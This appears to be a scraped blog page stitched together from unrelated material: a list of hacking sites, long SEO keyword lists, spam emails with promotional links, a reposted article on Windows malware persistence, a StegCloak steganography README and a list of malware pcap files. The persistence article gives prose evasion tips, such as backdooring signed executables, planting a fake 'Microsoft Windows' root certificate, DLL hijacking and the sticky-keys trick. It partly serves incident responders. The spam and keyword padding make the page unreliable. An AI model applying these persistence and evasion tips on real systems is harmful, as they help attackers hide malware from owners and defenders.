- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
- Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- Phrack Magazine: Digital hacking magazine.
- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
- Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
- DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
- Makezine: Magazine that celebrates your right to tweak, hack, and bend any technology to your own will.
Jun 30, 2020
Top 17 Best Websites To Learn Hacking 2018
¿QUÉ PASÓ CON LOS RESTOS DE HITLER? (Vídeo De La BBC)
More information
- Viaje 420
- Viaje Skull And Bones Cigars For Sale
- Viaje 4 Patas
- Curiosidades 11 De Septiembre
- Viaje Barato
- Viaje Que Significa
- Viaje De Chihiro
- Lifestyle Z Square Kanpur
- Curiosidades Wwe
- Lifestyle 600 System
- Curiosidades Forrest Gump
- Viaje Inmovil
- Lifestyle 50 Bose
- Viaje Republica Dominicana
- Curiosidades Windows
- Curiosidades Con Mike Edad
- Curiosidades 3Ds
- Curiosidades Puerto Rico
- Lifestyle Near Me Offers
- Lifestyle Management
- What Viajar Mean In Spanish
- Curiosidades Lgbt
- Lifestyle 4 Living
- Curiosidades In English
- Viaje Y Turismo
- Viaje Farmhand Andre
- Curiosidades Você Sabia
- Curiosidades 8 Mile
- Viaje Y Turismo
- Curiosidades Animais
- For Lifestyle Collection
- Curiosidades Batman Vs Superman
- Lifestyle Markets
- Curiosidades Con Mike Libro
- Viaje Que Es
- Viaje Por Europa
- Viajar Vs Ca Case Digest
- Lifestyle Entrepreneur
- Lifestyle Wireless
- Curiosidades 9
- Curiosidades 80S
- How Often Do Lifestyle Condoms Break
- Who You Are Curiosidades
- Lifestyle 360 App
- Viaje Misionero De Pablo
- Viaje 3
- Lifestyle Logo
- Curiosidades Juego De Tronos
- Lifestyle 74
- Curiosidades Keanu Reeves
- Lifestyle Ultra Sensitive Review
- Curiosidades Y Algo Mas
- Lifestyle 550
- Lifestyle 6X4Ft Greenhouse With Base
- Lifestyle Centre
- Lifestyle Video Ideas
- Lifestyle Elliptical
- Lifestyle Vs Diet
- Are Lifestyle Diseases Preventable
- 033 Lifestyle 1000 Hills
- Curiosidades Himym
- Viaje Kenia Y Zanzibar Precio
- Curiosidades 9/11
- Viaje Past Tense
- Lifestyle Equipment
- Curiosidades Plants Vs Zombies 2
- Curiosidades 13 Reason Why
- Viaje Ultimo Minuto
- What Does Curiosidades Mean In Spanish
- Viaje Virtual A Paris
- Curiosidades Instagram
- Viaje Hacia El Mar
- Lifestyle Nails
- Viaje Platino Perfecto
- Viaje Kenia Tanzania Y Zanzibar
- Viaje Koino Yokan
- Lifestyle Returns
- Curiosidades 6 De Agosto
- How Lifestyle Affects Circulatory And Respiratory System
- Lifestyle 8321
- Viaje A Marte
- Viaje Hamaki
- Curiosidades Tecnologicas
- Curiosidades Zootropolis
- Viaje 6 Dias Europa
- Viaje Super Shot
- Lifestyle 011
- Viajes Or El Mundo
- Another Word For Viaje
- Viaje Uber
- Curiosidades Wwe
- Viaje 7 Dias Marruecos
- French Word For Viaje
- Lifestyle 48 Series Iv
- Curiosidades The Office
- Curiosidades Ucrania
- Lifestyle 38
- Is Viaje A Noun
- Curiosidades Meaning
- Curiosidades Sobre 007
- Who Lifestyle Guidelines
- Lifestyle Trichy
- Curiosidades Mundo Animal
- Viaje Inmovil
- Why Don'T We Curiosidades
- Curiosidades Historia
- Viaje Vs Recorrido
- Will Witon Viaje A Las Estrellas
- Lifestyle Extra Sling
- Curiosidades Koalas
- Lifestyle X
- Lifestyle 535 Series Iii
- Curiosidades Benjamin Lacombe
- Curiosidades Libros
- Viaje Seguro
- Lifestyle Rentals
- Viaje Zombie Farmer Bill Hatchet
- Lifestyle Zoom
- Curiosidades Medicas
- Curiosidades Walking Dead
- Curiosidades 5 De Mayo
- Curiosidades Japon
- Lifestyle Of Bill Gates
- Curiosidades Xiaomi Redmi Note 8 Pro
- How Many Lifestyle Apps Are There
- Where Can Lifestyle Vouchers Be Used
- Viaje Hamaki Omakase
- Viaje In English
- Viaje 3 De La Tierra Ala Luna
- Curiosidades 50 Sombras De Grey
- Lifestyle 365
- Curiosidades Resident Evil
- Curiosidades Que Ninguém Sabia
- How To Say Viaje In English
- Why Nirmal Lifestyle Mulund Closed
- Curiosidades Zelda Breath Of The Wild
- Viaje 7 Dias Nueva York
- Lifestyle Wake
- Lifestyle 011
- Viaje De Chicas
- Curiosidades Benjamin Lacombe
- Why Healthy Lifestyle Is Important
- Fecha Viaje To English
- Curiosidades Sobre O Corpo Humano
- Lifestyle Of The Rich And Famous Lyrics
- Lifecycle 9500Hr
- When Does Lifestyle Sale Start
- Viaje Craft Series
- Viaje Bruce Banner Cigar Review
- Viaje En El Tiempo Pelicula
- Lifestyle 0
- Curiosidades Para Niños
- Viaje Por Viajes
- Spanish Translation For Viaje
- Viaje En El Tiempo
- Viaje Tailandia
- Lifestyle Zero Review
- Viaje Verde Letra
- 4 To Viaje De Colon
- Curiosidades Que No Sabias
- Lifestyle Network
Jun 28, 2020
re: Cheap Facebook Traffic
hi
a-camping-we-will-go.htmlnoreply
here it is, social website traffic:
http://www.mgdots.co/detail.php?id=113
Full details attached
Regards
Annita Aumick �
Unsubscribe option is available on the footer of our website
a-camping-we-will-go.htmlnoreply
here it is, social website traffic:
http://www.mgdots.co/detail.php?id=113
Full details attached
Regards
Annita Aumick �
Unsubscribe option is available on the footer of our website
Jun 16, 2020
re: Rank 1st in google with Content Marketing Strategy
hi
Get your business to the next level with a solid Content Marketing strategy
http://www.str8-creative.io/product/content-marketing/
Regards
Tera Riegel �
Unsubscribe option is available on the footer of our website
Get your business to the next level with a solid Content Marketing strategy
http://www.str8-creative.io/product/content-marketing/
Regards
Tera Riegel �
Unsubscribe option is available on the footer of our website
Jun 11, 2020
Many Ways Of Malware Persistence (That You Were Always Afraid To Ask)
TL;DR: Are you into red teaming? Need persistence? This post is not that long, read it ;)
Are you into blue teaming? Have to find those pesky backdoors? This post is not that long, read it ;)
In the previous post, I listed different ways how a Windows domain/forest can be backdoored. In this new post, I am digging a bit deeper, and list the most common/known ways malware can survive a reboot, just using local resources of the infected Windows system. The list is far from complete, and I would like to encourage everyone to comment on new methods, not yet listed here.
From an incident response point of view, one of the best strategies to find malware on a suspicious system is to search for suspicious entries that start with the system. In the good old days, you had to check for 2-3 locations to cover 99% of the infections. Nowadays, there are a thousand ways malware can start. The common ones automatically start whenever Windows starts (or the user logs in), but some tricky ones are triggered by other events.
Autoruns
My favorite choice when it comes to malware persistence is Sysinternals tools, Autoruns. In this paragraph, I mainly quote the official built-in help, but bear with me, it is still interesting.
On a side note, there are some problems with the Autoruns tool: it can only run on a live system. (EDIT: This is not true, Autoruns can analyze offline systems as well! Thanks to a comment from Justin.) And usually, this is not the case - I usually have dd images. And although VBoxManage can convert the dd images to VirtualBox disk image format, usually I don't have the time and storage to do that. This is where xmount awesomeness is here to rescue the day. It can convert dd and Encase images on-the-fly in-memory to Virtualbox format. Just attach the disk image to a new Virtualbox machine as the main boot HDD, modify the CPU/disk/controller settings until Windows starts instead of crashing, and voila, you can boot your forensic image - without modifying a single bit on the original evidence dd file. Another problem with malware analysis on a live system is that a good rootkit can fool the analyst easily.
For quick wins, I usually filter out Microsoft entries, look for per-user locations only and check for unverified (missing or invalid Authenticode) executables. This usually helps to find 90% of malware easily. Especially if it has a color like purple or pink, it is highly suspicious. To find the rest, well, one has to dig deeper.
![]() |
Zeus "hiding" in the usual random directory - check the faked timestamp |
To implement "poor-mans monitoring", regularly save the output of Autoruns, and during incident response, it will be highly valuable. Howto guide here.
Logon
"This entry results in scans of standard autostart locations such as the Startup folder for the current user and all users, the Run Registry keys, and standard application launch locations."
There are 42 registry keys/folders at the moment in Autoruns, which can be used to autostart a malware. The most common ways are the HKCU\Software\Microsoft\Windows\CurrentVersion\Run and the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder.
One of my favorite regarding this topic is the file-less Poweliks malware, 100% pure awesomeness. Typical ring 3 code execution.
Explorer
"Select this entry to see Explorer shell extensions, browser helper objects, explorer toolbars, active setup executions, and shell execute hooks". 71 registry keys, OMG. Usually, this is not about auto-malware execution, but some of them might be a good place to hide malware.
Internet explorer
"This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions". 13 registry key here. If a malicious BHO is installed into your browser, you are pretty much screwed.
![]() |
Scheduled tasks
"Task scheduler tasks configured to start at boot or logon." Not commonly used, but it is important to look at this.
I always thought this part of the autostart entries is quite boring, but nowadays, I think it is one of the best ways to hide your malware. There are so many entries here by default, and some of them can use quite good tricks to trigger the start.
Did you know that you can create custom events that trigger on Windows event logs?
Did you know you can create malware persistence just by using Windows tools like bitsadmin and Scheduled tasks?
![]() |
Scheduler in the old days |
![]() |
Scheduler in the new days |
Services
HKLM\System\CurrentControlSet\Services is a very commonplace to hide malware, especially rootkits. Check all entries with special care.
Drivers
Same as services. Very commonplace for rootkits. Unfortunately, signing a driver for 64-bit systems is not fun anymore, as it has to be signed by certificates that can be chained back to "Software Publisher Certificates". Typical startup place for Ring 0 rootkits.
Starting from Windows 10, even this will change and all drivers have to be signed by "Windows Hardware Developer Center Dashboard portal" and EV certificates.
Codecs
22 registry keys. Not very common, but possible code execution.
Boot execute
"Native images (as opposed to Windows images) that run early during the boot process."
5 registry keys here. Good place to hide a rootkit here.
Image hijacks
"Image file execution options and command prompt autostarts." 13 registry key here. I believe this was supposed for debugging purposes originally.
This is where the good-old sticky keys trick is hiding. It is a bit different from the others, as it provides a backdoor access, but you can only use this from the local network (usually). The trick is to execute your code whenever someone presses the SHIFT key multiple times before logging into RDP. The old way was to replace the sethc.exe, the new fun is to set a debug program on sethc.
![]() |
If you see this, you are in trouble |
AppInit
"This has Autoruns shows DLLs registered as application initialization DLLs." Only 3 registry keys here. This is the good old way to inject a malicious DLL into Explorer, browsers, etc. Luckily it is going to be deprecated soon.
Known DLLs
"This reports the location of DLLs that Windows loads into applications that reference them." Only 1 registry key. This might be used to hijack some system DLLs.
Winlogon
"Shows DLLs that register for Winlogon notification of logon events." 7 registry keys. Sometimes used by malware.
Winsock providers
"Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can disable them, but cannot delete them." 4 registry keys. AFAIK this was trendy a while ago. But still, a good place to hide malware.
Print monitors
"Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself." 1 registry key. Some malware writers are quite creative when it comes to hiding their persistence module.
LSA providers
"Shows registers Local Security Authority (LSA) authentication, notification and security packages." 5 registry keys. A good place to hide your password stealer.
Network providers
"Missing documentation". If you have a good 1 sentence documentation, please comment.
WMI filters
Sidebar gadgets
Common ways - not in autoruns
Now, let's see other possibilities to start your malware, which won't be listed in Sysinternals Autoruns.
Backdoor an executable/DLL
Just change the code of an executable which is either auto-starting or commonly started by the user. To avoid lame mistakes, disable the update of the file ... The backdoor factory is a good source for this task. But if you backdoor an executable/DLL which is already in Autoruns listed, you will break the Digital Signature on the file. It is recommended to sign your executable, and if you can't afford to steal a trusted certificate, you can still import your own CA into the user's trusted certificate store (with user privileges), and it will look like a trusted one. Protip: Use "Microsoft Windows" as the codesigner CA, and your executable will blend in.
![]() |
![]() |
![]() |
Hijack DLL load order
Just place your DLL into a directory which is searched before the original DLL is found, and PROFIT! But again, to avoid lame detection, be sure to proxy the legitimate function calls to the original DLL. A good source on this topic from Mandiant and DLL hijack detector.
![]() |
Here you can see how PlugX works in action, by dropping a legitimate Kaspersky executable, and hijacking the DLL calls with their DLL.
Hijack a shortcut from the desktop/start menu
Never underestimate the power of lame tricks. Just create an executable which calls the original executable, and meanwhile starts your backdoor. Replace the link, PROFIT! And don't be a skiddie, check the icon ;) I have seen this trick in adware hijacking browsers a lot of times.
![]() |
IE hijacked to start with http://tinyurl.com/2fcpre6 |
File association hijack
Choose the user's favorite file type, replace the program which handles the opening with a similar one described in the previous section, and voila!
COM object hijack
The main idea is that some COM objects are scanned for whether they are on the system or not, and when it is registered, it is automatically loaded. See COMpfun for details.
Windows Application Compatibility - SHIM
Not many people are familiar with Windows Application Compatibility and how it works. Think about it as an added layer between applications and the OS. If the application matches a certain condition (e.g. filename), certain actions will take place. E.g. emulation of directories, registry entries, DLL injection, etc. In my installation, there are 367 different compatibility fixes (type of compatibility "simulation"), and some of those can be customized.
![]() |
Every time IE starts, inject a DLL into IE |
Bootkits
Although bootkits shown here can end up in Autoruns in the drivers section (as they might need a driver at the end of the day), I still think it deserves a different section.
MBR - Master boot record
Malware can overwrite the Master boot record, start the boot process with its own code, and continue the boot process with the original one. It is common for rootkits to fake the content of the MBR record, and show the original contents. Which means one just have attached the infected HDD to a clean system, and compare the first 512 bytes (or more in some cases) with a known, clean state, or compare it to the contents shown from the infected OS. SecureBoot can be used to prevent malware infections like this.
![]() |
There is a slight difference when MBR is viewed from infected OS vs clean OS |
VBR - Volume boot record
This is the next logical step where malware can start it's process, and some malware/rootkit prefers to hide it's startup code here. Check GrayFish for details. SecureBoot can be used to prevent malware infections like this.
BIOS/UEFI malware
Both the old BIOS and the new UEFI can be modified in a way that malware starts even before the OS had a chance to run. Although UEFI was meant to be more secure than BIOS, implementation and design errors happens. Check the Computrace anti-theft rootkit for details.
Hypervisor - Ring -1 rootkit
This is somewhat special, because I believe although rootkit can run in this layer but it can't persist only in this layer on an average, physical machine, because it won't survive a reboot See Rutkowska's presentation from 2006 But because the hypervisor can intercept the restart event, it can write itself into one of the other layers (e.g. install a common kernel driver), and simply delete it after it is fully functional after reboot. Update: There is a good paper from Igor Korkin about hypervisor detection here.
SMM (System Management Mode) malware - Ring -2 rootkit
Somehow related to the previous type of attacks, but not many people know that System Management Mode can be used to inject code into the OS. Check the DEITYBOUNCE malware for more details ;) Also, abusing Intel Dual Monitor Mode (DMM) can lead to untrusted code execution, which basically monitors the SMM mode.
Intel® Active Management Technology - Ring -3 rootkit
According to Wikipedia, "Intel Active Management Technology (AMT) is hardware and firmware technology for remote out-of-band management of personal computers, in order to monitor, maintain, update, upgrade, and repair them". You can ask, what could possibly go wrong? See Alexander Tereshkin's and Rafal Wojtczuk's great research on this, or Vassilios Ververis thesis about AMT.
As not many people click on links, let me quote the scary stuff about AMT:
- Independent of the main CPU
- Can access host memory via DMA (with restrictions)
- Dedicated link to NIC, and its filtering capabilities
- Can force host OS to reboot at any time (and boot the system from the emulated CDROM)
- Active even in S3 sleep!
Other stuff
Create new user, update existing user, hidden admins
Esoteric firmware malware
Almost any component in the computer runs with firmware, and by replacing the firmware with a malicious one, it is possible to start the malware. E.g. HDD firmware (see GrayFish again), graphic card, etc.
Hidden boot device
Malware can hide in one of the boot devices which are checked before the average OS is loaded, and after the malware is loaded, it can load the victim OS.
Network-level backdoor
Think about the following scenario: every time the OS boots, it loads additional data from the network. It can check for new software updates, configuration updates, etc. Whenever a vulnerable software/configuration update, the malware injects itself into the response, and get's executed. I know, this level of persistence is not foolproof, but still, possible. Think about the recently discovered GPO MiTM attack, the Evilgrade tool, or even the Xensploit tool when we are talking about VM migration.
Software vulnerability
Almost any kind of software vulnerability can be used as a persistent backdoor. Especially, if the vulnerability can be accessed remotely via the network, without any user interaction. Good old MS08-067...
Hardware malware, built into the chipset
I am not sure what to write here. Ask your local spy agency for further information. Good luck finding those!
More links
Tools I highly recommend:
For more information, check this blog post, part 1, part 2
Update 2017-04-29: A very nice list of Office persistence: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
Update 2017-10-23: Persistence via Security Descriptors and ACLs: https://www.youtube.com/watch?v=SeR4QJbaNRg
Update 2018-07-25: Backdooring LAPS https://rastamouse.me/2018/03/laps---part-1/
https://rastamouse.me/2018/03/laps---part-2/
I would like to thank to Gabor Pek from CrySyS Lab for reviewing and completing this post.
Update 2017-04-29: A very nice list of Office persistence: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
Update 2017-10-23: Persistence via Security Descriptors and ACLs: https://www.youtube.com/watch?v=SeR4QJbaNRg
Update 2018-07-25: Backdooring LAPS https://rastamouse.me/2018/03/laps---part-1/
https://rastamouse.me/2018/03/laps---part-2/
I would like to thank to Gabor Pek from CrySyS Lab for reviewing and completing this post.
Continue reading
Stegcloak - Hide Secrets With Invisible Characters In Plain Text Securely Using Passwords
StegCloak is a pure JavaScript steganography module designed in functional programming style, to hide secrets inside text by compressing and encrypting with Zero Width Characters. It can be used to safely watermark strings, invisible scripts on webpages, texts on social media or for any other covert communication. Completely invisible!. See how it works in-depth here
Features
- Protect your invisible secret using passwords and HMAC integrity
- Cryptographically secure by encrypting the invisible secret using AES-256-CTR.
- Uses 7 Invisible characters in unicode characters that works everywhere in the web.
Including the most important ones Tweets, Gmail, Whatsapp, Telegram, Instagram, Facebook etc. - Maximum Compression to reduce the payload (LZ, Huffman).
- Completely invisible, uses Zero Width Characters instead of white spaces or tabs.
- Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.
- Written in pure functional style.
- Usage - Available as an API module, a CLI and also a Web Interface (optimized with web workers).
Installing
Using npm,
$ npm install -g stegcloak
$ npm install stegcloak
How it works
CLI Usage
Hide
$ stegcloak hide
hide [options] [secret] [cover]
-f, --file <file> Extract input from file
-n, --nocrypt If you don't need encryption (default: false)
-i, --integrity If additional security of preventing tampering is needed (default: false)
-o, --output <output> Stream the results to an output file
-h, --help display help for command
Reveal
$ stegcloak reveal
reveal [data]
-f, --file <file> Extract input from file
-cp, --clip Copy Data directly from clipboard
-o, --output <output> Stream the secret to an output file
-h, --help display help for command
API Usage
const StegCloak = require('stegcloak');
const stegcloak = new StegCloak(true, false); // Initializes with encryption true and hmac false for hiding
// These arguments are used only during hide
// Can be changed later by switching boolean flags for stegcloak.encrypt and stegcloak.integrity
What's HMAC and do I need it?
HMAC is an additional fingerprint security step taken towards tampering of texts and to verify if the message received was actually sent by the intended sender. If the data is sent through WhatsApp, Messenger or any social media platform, this is already taken care of! However, if you are using StegCloak in your program to safely transmit and retrieve, this option can be enabled and StegCloak takes care of it.
Hide
stegcloak.hide(secret,password,cover) -> string
const magic = stegcloak.hide("Voldemort is back", "mischief managed", "The WiFi's not working here!");
// Uses stegcloak.encrypt and stegcloak.integrity booleans for obfuscation
console.log(magic); // The WiFi's not working here!
Reveal
stegcloak.reveal(data, password) -> string
const secret = stegcloak.reveal(magic, "mischief managed");
// Automatically detects if encryption or integrity checks were done during hide and acts accordingly
console.log(secret); // Voldemort is back
Important
Stegcloak does'nt solve the alice-bob-warden problem, its powerful only when people are not looking for it and it helps you to achieve that really well given its invisible properties around the web! It could be safely used for watermarking in forums, invisible tweets,irc chats,social media etc. Please don't use it when you know there's someone who is actively sniffing your data looking at the unicode characters through a data analysis tool, in that case even though the secret encoded cannot be deciphered the fact lies that the warden ( Middle-man ) now knows some secret communication took place, cause he would have noticed an unusual amount of special invisible characters.
Resources
The following papers were referred to for insight and understanding of using Zero Width Characters in steganography.
- Milad Taleby Ahvanooey, Qianmu Li , Jun Hou, Ahmed Raza Rajput and Chen Yini
Modern Text Hiding, Text Steganalysis, and Applications: A Comparative Analysis
- Taleby Ahvanooey, Milad & Li, Qianmu & Hou, Jun & Dana Mazraeh, Hassan & Zhang, Jing.
AITSteg: An Innovative Text Steganography Technique for Hidden Transmission of Text Message via Social Media.
IEEE Access
Acknowledgements
The StegCloak logo was designed by Smashicons.
via KitPloit
This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com
Related articles
Collection Of Pcap Files From Malware Analysis
Update: Feb 19. 2015
We have been adding pcaps to the collection so remember to check out the folder ( Pcap collection) for the recent pcaps.
I had a project to test some malicious and exploit pcaps and collected a lot of them (almost 1000) from various public sources. You can see them in the PUBLIC folder. The credits go to the authors of the pcaps listed in the name of each file. Please visit their blogs and sites to see more information about the pcaps, see their recent posts, and send them thanks. The public pcaps have no passwords on them.
Update:Dec 13. 2014
Despite rare updates of this post, we have been adding pcaps to the collection so remember to check out the folder ( Pcap collection (New link)) for the recent pcaps!
Update:Dec 31. 2013 - added new pcaps
I did some spring cleaning yesterday and came up with these malware and exploit pcaps. Such pcaps are very useful for IDS and signature testing and development, general education, and malware identification. While there are some online public sandboxes offering pcaps for download like Cuckoo or Anubis but looking for them is a tedious task and you cannot be totally sure the pcap is for the malware family supposedly analysed - in other words, if the sandbox says it is Zeus does not necessarily mean that it is.
I found some good pcap repositories here (http://www.netresec.com/?page=PcapFiles) but there are very few pcaps from malware.
These are from identified and verified (to the best of my knowledge and belief - email me if you find errors) malware samples.
All of them show the first stage with the initial callback and most have the DNS requests as well. A few pcaps show extended malware runs (e.g. purplehaze pcap is over 500mb).
Most pcaps are mine, a few are from online sandboxes, and one is borrowed from malware.dontneedcoffee.com. That said, I can probably find the corresponding samples for all that have MD5 listed if you really need them. Search contagio, some are posted with the samples.
Each file has the following naming convention:
BIN [RTF, PDF] - the filetype of the dropper used, malware family name, MD5, and year+month of the malware analysis.
I will be adding more pcaps in the future. Please donate your pcaps from identified samples, I am sure many of you have.
Thank you
Download

All pcaps archives have the same password (same scheme), email me if you need it. I tried posting it without any passwords and pass infected but they get flagged as malware. Modern AV rips though zips and zips with the pass 'infected' with ease.
APT PCAPS
- 2012-12-31 BIN_Xinmic_8761F29AF1AE2D6FACD0AE5F487484A5-pcap
- 2013-09-08 BIN_TrojanPage_86893886C7CBC7310F7675F4EFDE0A29-pcap
- 2013-09-08 BIN_Darkcomet_DC98ABBA995771480AECF4769A88756E-pcap
- 2013-09-02 8202_tbd_ 6D2C12085F0018DAEB9C1A53E53FD4D1-pcap
- 2013-09-02 BIN_8202_6d2c12085f0018daeb9c1a53e53fd4d1-pcap
- 2013-09-02 BIN_Vidgrab_6fd868e68037040c94215566852230ab-pcap
- 2013-09-02 BIN_PlugX_2ff2d518313475a612f095dd863c8aea-pcap
- 2013-09-02 BIN_Taidoor_46ef9b0f1419e26f2f37d9d3495c499f-pcap
- 2013-09-02 BIN_Vidgrab_660709324acb88ef11f71782af28a1f0-pcap
- 2013-09-02 BIN_Gh0st-gif_f4d4076dff760eb92e4ae559c2dc4525-pcap.zip
- 2013-07-15 BIN_Taleret.E_5328cfcb46ef18ecf7ba0d21a7adc02c.pcap
- 2013-05-14 BIN_Mediana_0AE47E3261EA0A2DBCE471B28DFFE007_2012-10.pcap
- 2013-05-14 BIN_Hupigon_8F90057AB244BD8B612CD09F566EAC0C
- 2013-05-14 BIN_LetsGo_yahoosb_b21ba443726385c11802a8ad731771c0_2011-07-19
- 2013-05-13 BIN_IXESHE_0F88D9B0D237B5FCDC0F985A548254F2-2013-05-pcap
- 2013-05-06 BIN_DNSWatch_protux_4F8A44EF66384CCFAB737C8D7ADB4BB8_2012-11-pcap
- 2013-05-06 BIN_9002_D4ED654BCDA42576FDDFE03361608CAA_2013-01-30-pcap
- 2013-05-06 BIN_BIN_RssFeeder_68EE5FDA371E4AC48DAD7FCB2C94BAC7-2012-06-pcap (not a common name, see the traffic ssheet http://bit.ly/maltraffic )
- 2013-04-30 BIN_MSWab_Yayih_FD1BE09E499E8E380424B3835FC973A8_us-pcap
- 2013-04-29 BIN_LURK_AF4E8D4BE4481D0420CCF1C00792F484_20120-10-pcap
- 2013-04-29 BIN_XTremeRAT_DAEBFDED736903D234214ED4821EAF99_2013-04-13-pcap
- BIN_Enfal_Lurid_0fb1b0833f723682346041d72ed112f9_2013-01.pcap
- BIN_Gh0st_variant-v2010_B1D09374006E20FA795B2E70BF566C6D_2012-08.pcap
- BIN_Likseput_E019E37F19040059AB5662563F06B609_2012-10.pcap
- BIN_Nettravler_1f26e5f9b44c28b37b6cd13283838366.pcap
- BIN_Nettravler_DA5832657877514306EDD211DEF61AFE_2012-10.pcap
- BIN_Sanny-Daws_338D0B855421867732E05399A2D56670_2012-10.pcap
- BIN_Sofacy_a2a188cbf74c1be52681f998f8e9b6b5_2012-10.pcap
- BIN_Taidoor_40D79D1120638688AC7D9497CC819462_2012-10.pcap
- BIN_TrojanCookies_840BD11343D140916F45223BA05ABACB_2012_01.pcap
- PDF_CVE-2011-2462_Pdf_2011-12.pcap
- RTF_Mongall_Dropper_Cve-2012-0158_C6F01A6AD70DA7A554D48BDBF7C7E065_2013-01.pcap
- OSX_DocksterTrojan.pcap
CRIMEWARE PCAPS
- 2013-11-12_BIN_ChePro_2A5E5D3C536DA346849750A4B8C8613A-1.pcap
- 2013-10-15_BIN_cryptolocker_9CBB128E8211A7CD00729C159815CB1C.pcap
- 2013-09-20_BIN_Lader-dlGameoverZeus_12cfe1caa12991102d79a366d3aa79e9.pcap
- 2013-09-08 BIN_Tijcont_845B0945D5FE0E0AAA16234DC21484E0-pcap
- 2013-09-08 BIN_Kelihos_C94DC5C9BB7B99658C275B7337C64B33-pcap.zip
- 2013-08-19 BIN_Nitedrem_508af8c499102ad2ebc1a83fdbcefecb-pcap
- 2013-08-17 BIN_sality_CEAF4D9E1F408299144E75D7F29C1810-pcap
- 2013-08-15 BIN_torpigminiloader-pcap.zip
- 2013-13-08 EK_popads_109.236.80.170_2013-08-13.pcap
- 2013-11-08 BIN_Alinav5.3_4C754150639AA3A86CA4D6B6342820BE.pcap
- 2013-08-08 BIN_BitcoinMiner_F865C199024105A2FFDF5FA98F391D74-pcap
- 2013-08-07 BIN_ZeroAccess_Sirefef_C2A9CCC8C6A6DF1CA1725F955F991940_2013-08-pcap
- 2013-07-05 BIN_Kuluoz-Asprox_9F842AD20C50AD1AAB41F20B321BF84B
- 2013-05-31 Wordpress-Mutopy_Symmi_20A6EBF61243B760DD65F897236B6AD3-2pcap.pcap
- 2013-05-15 BIN_Zeus_b1551c676a54e9127cd0e7ea283b92cc-2012-04.pcap
- 2013-05-15 BIN_Gypthoy_3EE49121300384FF3C82EB9A1F06F288-2013-05.pcap
- 2013-05-12 BIN_PassAlert_B4A1368515C6C39ACEF63A4BC368EDB2-2013-05-13
- 2013-05-12 BIN_HorstProxy_EFE5529D697174914938F4ABF115F762-2013-05-13-pcap
- 2013-05-12 BIN_Bitcoinminer_12E717293715939C5196E604591A97DF-2013-05-12-pcap
- 2013-05-07 BIN_ZeroAccess_Sirefef_29A35124ABEAD63CD8DB2BBB469CBC7A_2013-05-pcapc
- 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
- 2013-05-05 BIN_GameThief_ECBA0FEB36F9EF975EE96D1694C8164C_2013-03-pcap
- 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
- 2013-04-27 EK_BIN_Blackhole_leadingto_Medfos_0512E73000BCCCE5AFD2E9329972208A_2013-04-pcap
- 2013-04-26 -- BIN_Citadel_3D6046E1218FB525805E5D8FDC605361-2013-04-samp
- BIN_CitadelPacked_2012-05.pcap
- BIN_CitadelUnpacked_2012-05.pcap
- BIN_Cutwail_284Fb18Fab33C93Bc69Ce392D08Fd250_2012-10.pcap
- BIN_Darkmegi_2012-04.pcap
- BIN_DarknessDDoS_v8g_F03Bc8Dcc090607F38Ffb3A36Ccacf48_2011-01.pcap-
- BIN_dirtjumper_2011-10.pcap
- BIN_DNSChanger_2011-12.pcap
- BIN_Drowor_worm_0f015bb8e2f93fd7076f8d178df2450d_2013-04.pcap
- BIN_Googledocs_macadocs_2012-12.pcap
- BIN_Imaut_823e9bab188ad8cb30c14adc7e67066d.pcap
- BIN_IRCbot_c6716a417f82ccedf0f860b735ac0187_2013-04.pcap
- BIN_Kelihos_aka_Nap_0feaaa4adc31728e54b006ab9a7e6afa.pcap
- BIN_LoadMoney_MailRu_dl_4e801b46068b31b82dac65885a58ed9e_2013-04 .pcap
- BIN_purplehaze-2012-01.pcap
- BIN_ponyloader_470a6f47de43eff307a02f53db134289.pcap
- BIN_Ramnitpcap_2012-01.pcap
- BIN_Reedum_0ca4f93a848cf01348336a8c6ff22daf_2013-03.pcap
- BIN_SpyEye_2010-02.pcap
- BIN_Stabuniq_F31B797831B36A4877AA0FD173A7A4A2_2012-12.pcap
- BIN_Tbot_23AAB9C1C462F3FDFDDD98181E963230_2012-12.pcap
- BIN_Tbot_2E1814CCCF0C3BB2CC32E0A0671C0891_2012-12.pcap
- BIN_Tbot_5375FB5E867680FFB8E72D29DB9ABBD5_2012-12.pcap
- BIN_Tbot_A0552D1BC1A4897141CFA56F75C04857_2012-12.pcap
- BIN_Tbot_FC7C3E087789824F34A9309DA2388CE5_2012-12.pcap
- BIN_Tinba_2012-06.pcap
